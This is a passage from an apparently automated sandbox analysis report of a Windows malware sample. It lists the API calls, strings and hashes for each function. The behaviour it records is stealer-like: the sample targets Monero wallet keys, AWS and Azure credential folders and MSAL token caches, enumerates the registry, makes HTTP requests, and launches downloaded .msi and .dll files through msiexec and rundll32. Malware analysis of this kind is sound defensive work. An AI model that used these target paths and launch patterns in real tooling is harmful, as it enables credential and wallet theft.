                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • InternetCloseHandle.WININET(00000000), ref: 00695FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: ada27705decc24a451a04ada51347b0b6b8735a5a619eb87b80982028eafd4cd
                        • Instruction ID: 8ed1997b99afd71d2eabce489edbdba223019e72a776ff5b2f0a9cc5549a5295
                        • Opcode Fuzzy Hash: ada27705decc24a451a04ada51347b0b6b8735a5a619eb87b80982028eafd4cd
                        • Instruction Fuzzy Hash: C7121D71821118AADB95FBE0DC95FEEB37ABF15700F50419EB10662091EF342E4ACF69
                        Function 0069CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0069D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0069D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D208
                        • lstrcat.KERNEL32(?,006B1478), ref: 0069D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D22A
                        • lstrcat.KERNEL32(?,006B147C), ref: 0069D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D24C
                        • lstrcat.KERNEL32(?,006B1480), ref: 0069D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D26E
                        • lstrcat.KERNEL32(?,006B1484), ref: 0069D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D290
                        • lstrcat.KERNEL32(?,006B1488), ref: 0069D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D2B2
                        • lstrcat.KERNEL32(?,006B148C), ref: 0069D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0069D2D4
                        • lstrcat.KERNEL32(?,006B1490), ref: 0069D2E3
                          • Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
                          • Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885
                        • lstrlen.KERNEL32(?), ref: 0069D32A
                        • lstrlen.KERNEL32(?), ref: 0069D339
                          • Part of subcall function 006AAA70: StrCmpCA.SHLWAPI(01268E90,0069A7A7,?,0069A7A7,01268E90), ref: 006AAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0069D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 1ed6473c6f73e3a1497af0258b59ca819ea1493d05a808c79bdaac20c58a7a74
                        • Instruction ID: bdc916cd8d5e4edccd75c0b6013fecb7d3ee548963346d7f0503740f3e685b47
                        • Opcode Fuzzy Hash: 1ed6473c6f73e3a1497af0258b59ca819ea1493d05a808c79bdaac20c58a7a74
                        • Instruction Fuzzy Hash: 2AE1F871911108ABCB88FBE0DD96EEE737ABF15301F10416AB507A6091DF35AE09CF66
                        Function 0069C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0126E520,00000000,?,006B144C,00000000,?,?), ref: 0069CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0069CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0069CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0069CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0069CAD9
                        • StrStrA.SHLWAPI(?,0126E4A8,006B0B52), ref: 0069CAF7
                        • StrStrA.SHLWAPI(00000000,0126E5F8), ref: 0069CB1E
                        • StrStrA.SHLWAPI(?,0126E690,00000000,?,006B1458,00000000,?,00000000,00000000,?,01268E80,00000000,?,006B1454,00000000,?), ref: 0069CCA2
                        • StrStrA.SHLWAPI(00000000,0126E670), ref: 0069CCB9
                          • Part of subcall function 0069C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0069C871
                          • Part of subcall function 0069C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0069C87C
                        • StrStrA.SHLWAPI(?,0126E670,00000000,?,006B145C,00000000,?,00000000,01268F00), ref: 0069CD5A
                        • StrStrA.SHLWAPI(00000000,01269110), ref: 0069CD71
                          • Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B46), ref: 0069C943
                          • Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B47), ref: 0069C957
                          • Part of subcall function 0069C820: lstrcat.KERNEL32(?,006B0B4E), ref: 0069C978
                        • lstrlen.KERNEL32(00000000), ref: 0069CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0069CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: 30dded79f7842c5bde37bff968bd509c72286896fdfa1f2b05d56d70213cacc1
                        • Instruction ID: b40cdb7f6ab98f5cabb93014c4a8fa172af3b76a8bfe821a14013c4b0fe0f548
                        • Opcode Fuzzy Hash: 30dded79f7842c5bde37bff968bd509c72286896fdfa1f2b05d56d70213cacc1
                        • Instruction Fuzzy Hash: 4BE1F971911108ABDB88FBE0DC92EEEB77AAF15300F50415EF10666191EF346E4ACF69
                        Function 006A8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • RegOpenKeyExA.ADVAPI32(00000000,0126C058,00000000,00020019,00000000,006B05B6), ref: 006A83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
                        • wsprintfA.USER32 ref: 006A8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006A847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 006A8499
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 2b11265214b54593bc9a213b9092886ae27288dff94e492ec1fd11f57fe41f2d
                        • Instruction ID: fadc0fbe4fe1e44b6edd13b6b4d1ef64e57e55f91ec3e90f31ecd1ecab1e8c42
                        • Opcode Fuzzy Hash: 2b11265214b54593bc9a213b9092886ae27288dff94e492ec1fd11f57fe41f2d
                        • Instruction Fuzzy Hash: CE811F719111189FEB68EB50CC95FEA77B9FF08700F108299E109A6180DF75AF85CF95
                        Function 006A4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 006A4DCD
                          • Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
                          • Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 006A4E59
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
                          • Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
                          • Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006A4EE5
                          • Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49B0
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B08D2), ref: 006A49C5
                          • Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A49E2
                          • Part of subcall function 006A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 006A4A1E
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,0126F990), ref: 006A4A4A
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,006B0FF8), ref: 006A4A5C
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,?), ref: 006A4A70
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,006B0FFC), ref: 006A4A82
                          • Part of subcall function 006A4910: lstrcat.KERNEL32(?,?), ref: 006A4A96
                          • Part of subcall function 006A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 006A4AAC
                          • Part of subcall function 006A4910: DeleteFileA.KERNEL32(?), ref: 006A4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 5ded770d55aea13f3d02be5a13f93cdd10ebbd19621a03937e94199eb8e9b4c8
                        • Instruction ID: 95dbc7ee6eac6b6e5ab441f3d4a3ff7cc5fd36b0707314fa3923c326303eda7d
                        • Opcode Fuzzy Hash: 5ded770d55aea13f3d02be5a13f93cdd10ebbd19621a03937e94199eb8e9b4c8
                        • Instruction Fuzzy Hash: 3141E5BA94020867CB94F770EC57FEE3339AB25700F404558B645660C1EEB45BC9CB92
                        Function 006A9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006A906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 6eedc87894d89ef17a04742f8429cb064e9c76a03fa72d4149122b0a036064e1
                        • Instruction ID: d252a65544ac0f8cf958928352432320c436f6f4f657f158366db5422b8895e7
                        • Opcode Fuzzy Hash: 6eedc87894d89ef17a04742f8429cb064e9c76a03fa72d4149122b0a036064e1
                        • Instruction Fuzzy Hash: FE71EFB5910208ABDB08EFE4DD89FEEB7B9BF49700F208619F515A7290DB349905CF61
                        Function 006A2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                        • API String ID: 2507796910-3625054190
                        • Opcode ID: c1e694ef7772747fd3d1c0c162d6ef3a70b02ba35c5474f84cad56e763ec0070
                        • Instruction ID: 277d234c00d6db6b5e484594ab40a673fc0bbb239ad60033b4e4f0390cfbfc4c
                        • Opcode Fuzzy Hash: c1e694ef7772747fd3d1c0c162d6ef3a70b02ba35c5474f84cad56e763ec0070
                        • Instruction Fuzzy Hash: 0612ED718101089ADB89FBE0DC92EEEB77AAF15300F50415EF50666192EF346F4ACF5A
                        Function 006A52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                          • Part of subcall function 00696280: InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
                          • Part of subcall function 00696280: StrCmpCA.SHLWAPI(?,0126FA00), ref: 00696303
                          • Part of subcall function 00696280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
                          • Part of subcall function 00696280: HttpOpenRequestA.WININET(00000000,GET,?,0126F1C0,00000000,00000000,00400100,00000000), ref: 00696385
                          • Part of subcall function 00696280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
                          • Part of subcall function 00696280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006A5318
                        • lstrlen.KERNEL32(00000000), ref: 006A532F
                          • Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 006A5364
                        • lstrlen.KERNEL32(00000000), ref: 006A5383
                        • lstrlen.KERNEL32(00000000), ref: 006A53AE
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
